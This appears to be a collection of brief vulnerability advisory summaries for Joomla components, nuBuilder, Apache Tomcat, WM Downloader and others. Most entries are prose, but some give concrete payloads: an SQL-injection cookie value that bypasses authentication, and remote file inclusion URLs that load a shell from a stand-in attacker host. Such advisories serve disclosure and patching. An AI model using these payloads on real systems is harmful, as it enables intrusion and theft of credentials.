An SQL injection vulnerability exists in the Joomla Galore Simple Shop component (com_simpleshop) due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability to inject arbitrary SQL commands into the application, allowing them to gain access to sensitive information such as usernames, passwords, and user types. The vulnerability is present in the 'index.php' file, where the 'id' parameter is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable application.
Some parameters passed to controller.php, when the task option is set to save and validate respectively, are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
WM Downloader is prone to a buffer overflow vulnerability when processing specially crafted .m3u files. This vulnerability is due to a boundary error when copying user-supplied data into an insufficiently sized memory buffer. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Some parameters passed to controller.php and imagehandler.php via POST when view is set to user and task is set to save_usercategory are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
An attacker can bypass authentication by setting a cookie with the username set to 'admin' and the code set to 'c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;'
nuBuilder 10.04.x and lower is vulnerable to Remote File Inclusion. The vulnerable file is report.php, which includes the $GLOBALS['StartingDirectory'] variable without any sanitization. This allows an attacker to inject malicious code into the application. The exploit can be tested with the PHP settings register_globals = On and Off, and allow_url_include = On. When register_globals = Off, the exploit can be triggered by sending a request to http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?. When register_globals = On, the exploit can be triggered by sending a request to http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?.
This exploit allows an attacker to traverse the directory structure of a vulnerable Apache Tomcat server and gain access to the /etc/passwd file. The exploit is based on a vulnerability in the server's UTF-8 decoding, which allows for directory traversal.
Some parameters passed to app.php when view is set to App and via POST in the vote form are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files.
The vulnerability is caused by specifying a large integer or string value for frame.frameBorder, which causes a denial of service (DoS) and may lead to code execution.